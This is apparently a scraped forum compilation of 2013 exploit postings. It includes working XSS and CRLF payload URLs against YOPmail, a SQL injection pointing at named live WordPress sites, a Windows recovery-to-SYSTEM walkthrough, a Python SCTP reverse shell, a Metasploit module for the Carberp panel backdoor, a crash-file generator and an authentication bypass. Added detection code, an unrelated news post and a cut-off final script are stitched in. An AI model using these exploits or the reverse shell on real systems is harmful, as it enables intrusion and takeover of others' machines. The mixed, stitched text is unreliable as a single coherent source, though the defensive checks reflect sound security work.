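Detection for the SSH password-guessing run shown in the ssh_login transcript above, as an added example that is not part of the advisory: it parses OpenSSH failed-login lines (a constructed sample, modelled on the root/operator/mailnull spray in the transcript) and flags a source that tries several usernames or exceeds a failure budget inside a sliding window. Thresholds and the log year are assumptions to tune per environment.

```python
"""Flag SSH password guessing of the kind shown in the ssh_login transcript.

Added example, not part of the advisory. Input is constructed in the OpenSSH
auth.log format; thresholds are assumptions to tune per environment.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH logs each rejected password as one line of this shape (no year in the timestamp).
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

# Constructed sample: one source cycles through root/operator/mailnull with blank and
# username-as-password guesses (BLANK_PASSWORDS/USER_AS_PASS in the transcript); a second
# source is a single user mistyping a password twice before logging in with a key.
SAMPLE_LOG = """\
Jun 28 10:00:01 web1 sshd[4101]: Failed password for root from 198.51.100.7 port 50011 ssh2
Jun 28 10:00:01 web1 sshd[4102]: Failed password for invalid user operator from 198.51.100.7 port 50012 ssh2
Jun 28 10:00:02 web1 sshd[4103]: Failed password for invalid user mailnull from 198.51.100.7 port 50013 ssh2
Jun 28 10:00:02 web1 sshd[4104]: Failed password for root from 198.51.100.7 port 50014 ssh2
Jun 28 10:00:03 web1 sshd[4105]: Failed password for invalid user operator from 198.51.100.7 port 50015 ssh2
Jun 28 10:00:03 web1 sshd[4106]: Failed password for invalid user mailnull from 198.51.100.7 port 50016 ssh2
Jun 28 10:00:04 web1 sshd[4107]: Failed password for root from 198.51.100.7 port 50017 ssh2
Jun 28 10:00:04 web1 sshd[4108]: Failed password for invalid user operator from 198.51.100.7 port 50018 ssh2
Jun 28 10:00:05 web1 sshd[4109]: Failed password for invalid user mailnull from 198.51.100.7 port 50019 ssh2
Jun 28 10:07:30 web1 sshd[4200]: Failed password for alice from 192.0.2.5 port 41000 ssh2
Jun 28 10:07:41 web1 sshd[4200]: Failed password for alice from 192.0.2.5 port 41000 ssh2
Jun 28 10:07:55 web1 sshd[4200]: Accepted publickey for alice from 192.0.2.5 port 41000 ssh2
"""


def parse_failed_logins(lines, year=2013):
    """Yield (timestamp, user, source_ip) for every failed-password line; other lines are ignored."""
    for line in lines:
        m = FAILED_RE.match(line.strip())
        if m:
            ts = datetime.strptime("%d %s" % (year, m["ts"]), "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]


def detect_bruteforce(lines, window=timedelta(minutes=5), max_attempts=10, max_users=3):
    """Return {source_ip: {"attempts": n, "users": [...]}} for every source that, inside one
    sliding window, either exceeds max_attempts failures or sprays max_users distinct logins."""
    per_ip = defaultdict(list)
    for ts, user, ip in parse_failed_logins(lines):
        per_ip[ip].append((ts, user))
    alerts = {}
    for ip, events in per_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until it spans at most `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            in_window = events[start:end + 1]
            if len(in_window) >= max_attempts or len({u for _, u in in_window}) >= max_users:
                alerts[ip] = {"attempts": len(events),
                              "users": sorted({u for _, u in events})}
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print("%s: %d failures across %s" % (ip, info["attempts"], ", ".join(info["users"])))
```

A flagged source is the input a lockout or rate-limit rule (the restriction the advisory found missing) would act on; the legitimate user with two typos stays below both thresholds.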
-
Description : YOPMail suffers from cross site scripting, HTTP response splitting, CRLF injection, and session token handling vulnerabilities.
Author : Juan Carlos Garcia
Source : YOPMail XSS / Injection / HTTP Response Splitting - Packet Storm
Code :

YOPMAIL (Anonymous & Free email address) CRLF Injection - HTTP Response Splitting / XSS / Session Token in URL
==================================================================================================================================================

Report-Timeline:
================
2013-06-01: Researcher Notification
2013-06-03: RESPONSE
2013-06-07: Ask About the issues
2013-06-10: Vendor Feedback
2013-06-13: Not Fixed
2013-06-16: Ask About the Issues
2013-06-27: Not Fixed / Not Response
2013-06-28: Full Disclosure

I-VULNERABILITIES
======================
#Title: YOPMAIL (Anonymous & Free email address) YopMail CRLF Injection - HTTP Response Splitting / XSS / Session Token in URL
#Vendor: http://www.yopmail.com
#Author: Juan Carlos García (@secnight)
#Follow me: http://www.highsec.es http://hackingmadrid.blogspot.com Twitter: @secnight

II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. They keep a message up for 8 days. It's possible to send a message to another YOPmail address. No registration required. Firefox, Internet Explorer 7 and Opera add-ons are downloadable. There are alternate domains.

Domains: @yopmail.fr @yopmail.net @cool.fr.nf @jetable.fr.nf @nospam.ze.tc @nomail.xl.cx @mega.zik.dj @speed.1s.fr @courriel.fr.nf @moncourrier.fr.nf @monemail.fr.nf @monmail.fr.nf @mail.mezimages.net
The site has new domains every three months.

III-PROOF OF CONCEPT
======================

CRLF INJECTION - HTTP RESPONSE SPLITTING
______________________________________
The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack.
Hackers are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user defacement, poisoning of the client's web cache, hijacking of web pages, defacement and a myriad of other related attacks.

Attacks
-------
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717

Multiple CROSS SITE SCRIPTING
_______________________________
The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.

Attacks
--------
Below I expose a few vulnerabilities, because there are many failures of this type in this web service... So much XSS..
Affected items (root pages, then the same pages under each language prefix)
--------------
/add-domain.php /alternate-domains.php /alternate-email-address.php /conditions.php /contact.php /definitions/email-jetable.php /definitions/mail-anonyme.php /definitions/spam.php /donation.php /email-anonyme.php /email-generator.php /faq.php /index.php /plugins.php /privacy.php /send-mail.php /yopmail-chat.php
/en /en/add-domain.php /en/alternate-domains.php /en/alternate-email-address.php /en/conditions.php /en/contact.php /en/definitions /en/definitions/email-jetable.php /en/definitions/mail-anonyme.php /en/definitions/spam.php /en/donation.php /en/email-anonyme.php /en/email-generator.php /en/faq.php /en/images /en/index.php /en/plugins.php /en/privacy.php /en/send-mail.php /en/style /en/style/pic /en/yopmail-chat.php
/es /es/add-domain.php /es/alternate-domains.php /es/alternate-email-address.php /es/conditions.php /es/contact.php /es/definitions /es/definitions/email-jetable.php /es/definitions/mail-anonyme.php /es/definitions/spam.php /es/donation.php /es/email-anonyme.php /es/email-generator.php /es/faq.php /es/images /es/index.php /es/plugins.php /es/privacy.php /es/send-mail.php /es/style /es/style/pic /es/yopmail-chat.php
/fr /fr/add-domain.php /fr/alternate-domains.php /fr/alternate-email-address.php /fr/conditions.php /fr/contact.php /fr/definitions /fr/definitions/email-jetable.php /fr/definitions/mail-anonyme.php /fr/definitions/spam.php /fr/donation.php /fr/email-anonyme.php /fr/email-generator.php /fr/faq.php /fr/images /fr/index.php /fr/plugins.php /fr/privacy.php /fr/send-mail.php /fr/style /fr/style/pic /fr/yopmail-chat.php
/it /it/add-domain.php /it/alternate-domains.php /it/alternate-email-address.php /it/conditions.php /it/contact.php /it/definitions /it/definitions/email-jetable.php /it/definitions/mail-anonyme.php /it/definitions/spam.php /it/donation.php /it/email-anonyme.php /it/email-generator.php /it/faq.php /it/images /it/index.php /it/plugins.php /it/privacy.php /it/send-mail.php /it/style /it/style/pic /it/yopmail-chat.php
/pl /pl/add-domain.php /pl/alternate-domains.php /pl/alternate-email-address.php /pl/conditions.php /pl/contact.php /pl/definitions /pl/definitions/email-jetable.php /pl/definitions/mail-anonyme.php /pl/definitions/spam.php /pl/donation.php /pl/email-anonyme.php /pl/email-generator.php /pl/faq.php /pl/images /pl/index.php /pl/plugins.php /pl/privacy.php /pl/send-mail.php /pl/style /pl/style/pic /pl/yopmail-chat.php
/ru /ru/add-domain.php /ru/alternate-domains.php /ru/alternate-email-address.php /ru/conditions.php /ru/contact.php /ru/definitions /ru/definitions/email-jetable.php /ru/definitions/mail-anonyme.php /ru/definitions/spam.php /ru/donation.php /ru/email-anonyme.php /ru/email-generator.php /ru/faq.php /ru/images /ru/index.php /ru/plugins.php /ru/privacy.php /ru/send-mail.php /ru/style /ru/style/pic /ru/yopmail-chat.php
/uk /uk/add-domain.php /uk/alternate-domains.php /uk/alternate-email-address.php /uk/conditions.php /uk/contact.php /uk/definitions /uk/definitions/email-jetable.php /uk/definitions/mail-anonyme.php /uk/definitions/spam.php /uk/donation.php /uk/email-anonyme.php /uk/email-generator.php /uk/faq.php /uk/images /uk/index.php /uk/plugins.php /uk/privacy.php /uk/send-mail.php /uk/style /uk/style/pic /uk/yopmail-chat.php
/zh /zh/add-domain.php /zh/alternate-domains.php /zh/alternate-email-address.php /zh/conditions.php /zh/contact.php /zh/definitions /zh/definitions/email-jetable.php /zh/definitions/mail-anonyme.php /zh/definitions/spam.php /zh/donation.php /zh/email-anonyme.php /zh/email-generator.php /zh/faq.php /zh/images /zh/index.php /zh/plugins.php /zh/privacy.php /zh/send-mail.php /zh/style /zh/style/pic /zh/yopmail-chat.php

Method GET
----------
http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec
http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec
http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid
http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E
http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E
http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E
http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E
http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E
http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E

Method POST
------------
http://www.yopmail.com:80/send-mail.php
Request Data
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst

http://www.yopmail.com:80/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php
Request Data
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt%28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

SESSION TOKEN IN URL
____________________
This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL. URLs could be logged or leaked via the Referer header.
Affected items
--------------
/cr.php (78a3a31e275b316f36665b35eb4bfe21)
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1)
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3)
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca)
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)

Examples

Method GET
----------
http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&
http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Method POST
-----------
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Request Data
act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Request Data
act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

IV. CREDITS
-------------------------
These vulnerabilities have been discovered by Juan Carlos García (@secnight)

V. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage caused by the use or misuse of this information.
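Two checks for the findings in this advisory, as an added example that is not YOPmail's code: a response builder that copies a parameter into a header the way cr.php?cfg= is reported to, beside one that refuses CR/LF, and a query-string audit for session identifiers such as the PHPSESSID= URLs listed above. The payload is decoded from the first PoC URL; the header name X-Config and the list of session parameter names are assumptions.

```python
"""Checks for the two YOPmail findings: CR/LF reaching a response header (cr.php?cfg=...)
and a session token carried in the query string (PHPSESSID=...).

Added example, not YOPmail's code. The unchecked builder only mimics the reported
behaviour (parameter concatenated into a header); the header name is an assumption.
"""
from urllib.parse import unquote, urlsplit, parse_qs


class HeaderInjection(ValueError):
    """Raised when a value would break out of its header line."""


def build_response_unchecked(cfg):
    """Vulnerable pattern: request parameter concatenated straight into a response header."""
    return "HTTP/1.1 200 OK\r\nX-Config: " + cfg + "\r\nContent-Length: 0\r\n\r\n"


def safe_header_value(value):
    """Hardened: refuse CR, LF and NUL so one parameter can only ever be one header line.
    Silently stripping them is the common alternative; rejecting keeps the attempt visible."""
    if any(ch in value for ch in "\r\n\0"):
        raise HeaderInjection("control character in header value: %r" % value)
    return value


def build_response_checked(cfg):
    return "HTTP/1.1 200 OK\r\nX-Config: " + safe_header_value(cfg) + "\r\nContent-Length: 0\r\n\r\n"


def header_lines(raw_response):
    """The header block split as a client sees it: status line, then one entry per CRLF."""
    return raw_response.split("\r\n\r\n", 1)[0].split("\r\n")


# Decoded from the PoC: cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight.
# The leading space makes strict parsers treat the new line as an obs-fold continuation of
# the previous header; the point is that an attacker-controlled line appears in the response.
INJECTED_CFG = unquote("%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight")

# Query parameter names that usually carry a session identifier (assumed list, extend as needed).
SESSION_PARAMS = {"phpsessid", "sessionid", "jsessionid", "sid"}


def session_tokens_in_url(url):
    """Return the query parameter names in url that look like session identifiers."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(name for name in qs if name.lower() in SESSION_PARAMS)


def audit_urls(urls):
    """Map each URL carrying a session token in its query string to the offending parameter names;
    these are the URLs that end up in proxy logs and Referer headers."""
    found = {}
    for url in urls:
        names = session_tokens_in_url(url)
        if names:
            found[url] = names
    return found


if __name__ == "__main__":
    print(header_lines(build_response_unchecked(INJECTED_CFG)))
    try:
        build_response_checked(INJECTED_CFG)
    except HeaderInjection as exc:
        print("rejected:", exc)
    print(audit_urls(["http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6",
                      "http://www.yopmail.com/cr.php?cfg=0&r=211"]))
```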
-
Description : If you have physical access to a Microsoft Windows 7 SP1 instance, you can leverage the "Launch startup Repair" functionality to gain SYSTEM access.
Author : Anastasios Monachos
Source : Windows 7 SP1 Local Access SYSTEM Compromise - Packet Storm
Code :

##############################################################################################
# Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]
# Vendor: Microsoft
# Affected Software: Windows 7 SP1 (and probably other)
# Title: Owning Windows 7 - From Recovery to "nt authority\system" - Physical Access Required
# See also: http://intelcomms.blogspot.com/2013/05/owning-windows-7-from-recovery-to-nt.html
##############################################################################################

Just wanted to share with you the below, which I have already communicated to Microsoft. According to the MSRC team, "An attacker with unrestricted physical access can certainly manipulate a system in multiple ways. This is not something we consider a security vulnerability." - thus no CVE. "Computer owners should provide for physical security of systems as part of best practices. There is more discussion of physical access in the "10 Immutable Laws of Security" (http://technet.microsoft.com/en-us/library/hh278941.aspx) under Law #3".

The scenario is as follows:
1. Windows 7 SP1, and
2. Workstation with BIOS settings to restrict boot up from CD, and
3. Workstation joined in Windows Active Directory or Standalone

By forcing the machine to boot or shut down abnormally (e.g. pressing ctrl+alt+del during bootup, or pressing the power button (kill) during shutdown), Windows will enter the "Windows Error Recovery" menu asking us whether we wish to "Launch startup Repair (recommended)" or "Start Windows Normally".

Select "Launch Startup Repair (recommended)". The recovery process will display a "Windows is loading files...." message, then after a while we enter the "Startup Repair" process (graphical interface).

A message might appear asking you if you want to "Restore your computer using System Restore"; select Cancel if it does.

Shortly, a new message box will come up prompting us to "Send information about the problem (recommended)" or "Don't send", and at the bottom of this dialog box an option labelled "View problem details" exists.

Click on "View problem details"; you will get information such as "Problem signature" and more. Note that at the very bottom of this textarea a link exists which points to the X drive (X:\windows\system32\en-US\erofflps.txt).

Clicking on the link, Notepad launches. From there, one can go to File | Open, view all contents of the C/D/X/etc drive (c:\documents and settings\* and any other drive available), copy files to/from different locations/drives, create files, launch cmd.exe, backdoor Windows etc.

Through the MS-DOS prompt we noticed we had been granted "nt authority\system" privileges, which makes sense in order to perform the recovery operation, but it's too easy for anyone to abuse them provided he has casual physical access (e.g. in environments such as libraries, universities, offices, reception front desks etc; I will leave your imagination from this point to work :)

As probably others may agree with me, "nt authority\system" access should not be so easily given (or acquired by default, by design, whatever you name it); at a minimum a password prompt or other control should exist to prevent the ownage.
-
Description : WordPress WP-Private-Messages third party plugin suffers from a remote SQL injection vulnerability.
Author : IeDb
Source : WordPress WP-Private-Messages SQL Injection - Packet Storm
Code :

The Wordpress wp-private-messages Plugin suffers from a Sql Injection vulnerability.
#################################
# Iranian Exploit DataBase
# Www.exploit.IrIsT.Ir
#################################
# Exploit Title : Wordpress wp-private-messages Plugin Sql Injection vulnerability
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Home : http://exploit.IrIsT.Ir
# Software Link : http://wordpress.org/plugins/wp-private-messages/
# Security Risk : High
# Tested on : Linux
#################################
# Exploit :
# http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
# Dem0 :
# http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
# http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
#################################
# Vuln Source C0de :
# Line 145 :
# $messages = $wpdb->get_results("SELECT id, sender, subject, date, status FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."' AND tosee = 1 ORDER BY date DESC");
# And Line 160 :
# echo "<a href=\"?page=".dirname(plugin_basename(__FILE__))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img src=\"". get_settings('siteurl') . "/wp-content/plugins/".dirname(plugin_basename(__FILE__))."/icons/reply.png\" alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>";
#################################
# Exploit Archive : http://exploit.irist.ir/exploits-148.html
#################################
-
A Romanian city, number 1 in the world for Internet speed
Matt replied to Syckchet's topic in Stiri securitate
"Next is Lithuania in 2nd place with 28.18 Mbps, and Taiwan in 3rd place with 37.78 Mbps." Probably Lithuania in 2nd with 38 Mbps. I read a similar news story a year or two ago, and Timisoara was 3rd then.
Facebook's problems regarding the security and online privacy of its users have always been on the table, to a greater or lesser degree. Recently, a Norton report showed that the official "Facebook" app for Android automatically sends your phone number to the social network's servers, even before you log in. In response, Facebook said they would fix the problem, apparently did so with an update, and claimed they would delete the phone numbers from the server. Nowhere is it mentioned, however, what changes that update brings. Considering that the app has been downloaded more than 7 million times, imagine what a database of phone numbers Facebook had... A closer look at the permissions of the Facebook app for Android will only scare you, because it has the characteristics of spyware. Thus, in theory, the app can at any time use the microphone or the camera to record, take photos or film, without the user's consent. Given the precedent described above... I am very much afraid that this unlimited access to the smartphone's resources does not bode well. Source: Norton: Android app skips consent, gives Facebook servers user phone numbers | ZDNet
-
He had to meet his quota of "quality" posts.
-
Description : This is a reverse shell over SCTP implemented in Python. Currently it does not use SSL, but may evade most firewalls and IDS devices as many of them seemingly have no rules in place to check SCTP traffic.
Author : Infodox
Source : SCTP Reverse Shell - Packet Storm
Code :

#!/usr/bin/python
# SCTP Reverse Shell (TCP mode)
# Requires pysctp and sctp to be working
# on the victim box.
# My perfect saturday... Involves
#
# infodox - Insecurety Research 2013
# insecurety.net | @info_dox
# I probably imported too much things. Who cares.
import socket
import _sctp
import sctp
from sctp import *
import os
import subprocess

host = '127.0.0.1' # CHANGEME
port = 1337 # CHANGEME
socket.setdefaulttimeout(60)
s = None
try:
    s = sctpsocket_tcp(socket.AF_INET)
    s.connect((host,port))
    s.send('g0tsh3ll!\n')
    save = [ os.dup(i) for i in range(0,3) ]
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    shell = subprocess.call(["/bin/sh","-i"])
    [ os.dup2(save[i],i) for i in range(0,3)]
    [ os.close(save[i]) for i in range(0,3)]
    os.close(s.fileno())
except Exception:
    print "Connection Failed! Is there even a listener?"
    pass
-
Description : Xorbin Analog Flash Clock plugin version 1.0 for Joomla suffers from a flash-based cross site scripting vulnerability.
Author : Prakhar Prasad, Rafay Baloch
Source : Xorbin Analog Flash Clock 1.0 For Joomla XSS - Packet Storm
Code :

====================================================================
Xorbin Analog Flash Clock 1.0 Extension for Joomla Flash-based XSS
====================================================================

Description: This plugin displays an analog flash clock on your website. It's easy to use and highly customizable. You can add an analog flash clock to your website as a widget and use as many clocks as you like on one page.

Published: 30-06-2013
Version : 1.0
Severity : Low to Moderate
CVSS Score: 5
CVE: 2013-4692
Authors : Prakhar Prasad http://www.prakharprasad.com
          Rafay Baloch http://www.rafayhackingarticles.net
Download : http://extensions.joomla.org/extensions/calendars-a-events/time/clocks/21026
Vendor : XORBin http://www.xorbin.com/
Google Dork: inurl:mod_xoranalogclock

Details: The vulnerability exists in the "xorAnalogClock.swf" file of this extension: the "widgetUrl" and "urlWindow" parameters are taken from external input and passed first into URLRequest() and then to the navigateToURL() function.

Pseudocode:
navigateToURL(new URLRequest(_root.widgetUrl), _root.urlWindow);

Proof-of-Concept:
http://domain.tld/joomla/modules/mod_xoranalogclock/media/xorAnalogClock.swf#?urlWindow=_self&widgetUrl=javascript:alert(1);

Clicking on the clock will execute the Javascript payload.

Solution: A similar method can be applied as described here - https://code.google.com/p/doctype-mirror/wiki/ArticleFlashSecurityGetURL
-
Description : This Metasploit module exploits backdoors that can be sighted all over the leaked source code of the Carberp botnet C2 Web Panel.
Author : Luis Santana, bwall, Steven K
Source : Carberp Web Panel C2 Backdoor Remote PHP Code Execution - Packet Storm
Code :

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Carberp Web Panel C2 Backdoor Remote PHP Code Execution',
      'Description'    => %q{
        This module exploits backdoors that can be sighted all over the leaked
        source code of the Carberp botnet C2 Web Panel.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bwall(Brian Wallace) <bwallace[at]cylance.com>',       # msf module
          'connection(Luis Santana) <hacktalkblog[at]gmail.com>', # exploit reporting
          'Steven K <xylitol[at]malwareint[d0t]com>'              # discovery and reporting
        ],
      'References'     =>
        [
          ['URL', 'http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Keys'        => ['php'],
          'Space'       => 10000,
          'DisableNops' => true
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['carberp', {}] ],
      'DisclosureDate' => 'Jun 28 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The path to the backdoor, often just index.php", "/index.php"]),
        OptString.new('BOTID', [true, 'Hardcoded backdoor bot ID that can run PHP eval', 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV']),
      ], self.class)
  end

  def check
    confirm_string = rand_text_alpha(8)
    cmd = "echo '#{confirm_string}';"
    shell = http_send_command(cmd)
    check_code = Exploit::CheckCode::Safe
    if shell and shell.body.include?(confirm_string)
      check_code = Exploit::CheckCode::Vulnerable
    end
    check_code
  end

  def http_send_command(cmd)
    uri = normalize_uri(target_uri.path.to_s)
    request_parameters = {
      'method'    => 'POST',
      'uri'       => uri,
      'vars_post' => {
        'id'   => datastore['BOTID'],
        "data" => Rex::Text.encode_base64(cmd.unpack('H*'))
      }
    }
    res = send_request_cgi(request_parameters)
    res
  end

  def exploit
    http_send_command(payload.encoded)
  end
end
-
Author : metacom
Source : AVS Media Player 4.1.11.100 (.ac3) - Denial of Service
Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/44cd3f96f572b1c4288fcdbfc1aa2093-AVSMediaPlayer.exe
Code :

#!/usr/bin/python
print """
[+]Exploit Title:AVS Media Player(.ac3)Denial of Service Exploit
[+]Vulnerable Product:4.1.11.100
[+]Download Product:http://www.avs4you.com/de/downloads.aspx
[+]All AVS4YOU Software has problems with format .ac3
[+]Date: 29.06.2013
[+]Exploit Author: metacom
[+]RST
[+]Tested on: Windows 7
"""
buffer=(
"\x0B\x77\x3E\x68\x50\x40\x43\xE1\x06\xA0\xB9"
"\x65\xFF\x3A\xBE\x7C\xF9\xF3\xE7\xCF\x9F\x3E"
)
junk = "\x41" * 5000
bob = "\x42" * 100
exploit = buffer+ junk + bob
try:
    rst= open("exploit.ac3",'w')
    rst.write(exploit)
    rst.close()
    print("\nExploit file created!\n")
except:
    print "Error"
-
Author : Chako
Source : C.P.Sub 4.5 - Authentication Bypass
Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/ec51b632d15a04cdc4a5974372600f7a-cpsub_v4.5.zip
Code :

#!/usr/bin/python
#
# ####################################################################
#
# Exploit Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication
# Date: 2013/6/27
# Exploit Author: Chako
# Vendor Homepage: http://www.cooltey.org/ping/php.php
# Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip
# Version: <= v4.5
# Tested on: Windows 7
#
# ####################################################################

Improper Authentication:
==========================================
Description:
C.P.Sub <= v4.5 uses the "user_com=" parameter to identify whether the user has admin privilege. Therefore an attacker could simply change the value of the "user_com=" parameter to gain admin privilege.

/check.php (LINE: 36-44)
--------------------------------------------------------------
if($_GET[user_com] != "") {
    $user_com = $_GET[user_com];
}elseif($_POST[user_com] != "") {
    $user_com = $_POST[user_com];
}
if($user_com == "biggest") {
--------------------------------------------------------------

Exploit:
--------------------------------------------------------------
change
http://Example_Target/info.php?cookie=yes&user_com=second
to
http://Example_Target/info.php?cookie=yes&user_com=biggest

Misconfiguration
==========================================
There are some default accounts for C.P.Sub <= v4.5 that allow an attacker to access the back-end management page. It could lead to further attack.
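The check.php pattern above (admin decided by a user_com value the client supplies) next to a server-side decision, plus a log check for the parameter being tampered with, as an added example that is not C.P.Sub's code. SESSIONS and ROLES are a constructed stand-in for the application's session store and user table, the log lines are constructed, and the trailing session field in them is an assumed log format.

```python
"""The C.P.Sub check.php pattern (admin decided by a user_com request parameter) beside a
server-side decision, plus a log check for tampering with that parameter.

Added example, not C.P.Sub's code. SESSIONS/ROLES stand in for the application's session
store and user table; log lines are constructed and carry the session id as a last field.
"""
import re
from urllib.parse import urlsplit, parse_qs

SESSIONS = {"s-4f2a": "alice", "s-9c1d": "bob"}   # session cookie -> login (constructed)
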